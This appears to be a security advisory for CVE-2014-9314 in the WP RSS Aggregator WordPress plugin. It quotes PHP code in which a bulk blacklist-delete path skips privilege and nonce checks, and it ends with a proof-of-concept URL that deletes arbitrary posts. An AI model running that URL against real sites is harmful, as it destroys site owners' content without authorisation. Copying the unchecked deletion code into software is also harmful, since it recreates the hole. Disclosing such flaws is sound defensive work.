WP RSS Aggregator 4.6.3 Post Deletion

Homepage:

https://wordpress.org/plugins/wp-rss-aggregator/

CVE-ID

CVE-2014-9314

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:N/I:P/A:N)

Description:

feed-blacklist.php is run every time when website is displayed.

File: wp-rss-aggregator\wp-rss-aggregator.php

/* Load the blacklist functions file */
require_once ( WPRSS_INC . 'feed-blacklist.php' );

wprss_check_if_blacklist_delete() is run on init action.

File: wp-rss-aggregator\includes\feed-blacklist.php

// Check if deleting a blacklist item, from the GET parameter
add_action( 'init', 'wprss_check_if_blacklist_delete' );

Administrator privileges are NOT checked when we pass $_GET['wprss-bulk'].

File: wp-rss-aggregator\includes\feed-blacklist.php

function wprss_check_if_blacklist_delete() {
	// If the GET param is not set, do nothing. Return.
	if ( empty( $_GET['wprss-blacklist-remove'] ) ) return;
	
	// The array of blacklist entries to delete
	$to_delete = array();
	// The ID of the blacklist entry - if only deleting a single entry
	$ID = $_GET['wprss-blacklist-remove'];
	
	// check if deleting in bulk
	if ( isset( $_GET['wprss-bulk'] ) && $_GET['wprss-bulk'] == '1' ) {
		$to_delete = explode( ',', $ID );
	} else {
		$to_delete = array( $ID );
		// Get the ID from the GET param
		// Verify the nonce
		check_admin_referer( 'blacklist-remove-' . $ID, 'wprss_blacklist_trash' );
	}
	
	// Delete the posts marked for delete
	foreach( $to_delete as $delete_id ) {
		wp_delete_post( $delete_id, TRUE );
	}
	
	// Redirect back to blacklists page
	$paged = isset( $_GET['paged'] )? '&paged=' . $_GET['paged'] : '';
	header('Location: ' . admin_url('edit.php?post_type=wprss_blacklist' . $paged ) );
	exit;
}

Proof of Concept:

Anyone can delete any posts.

For example delete post ID=1 and ID=2:

http://wordpress-install/?wprss-blacklist-remove=1,2&wprss-bulk=1

Timeline: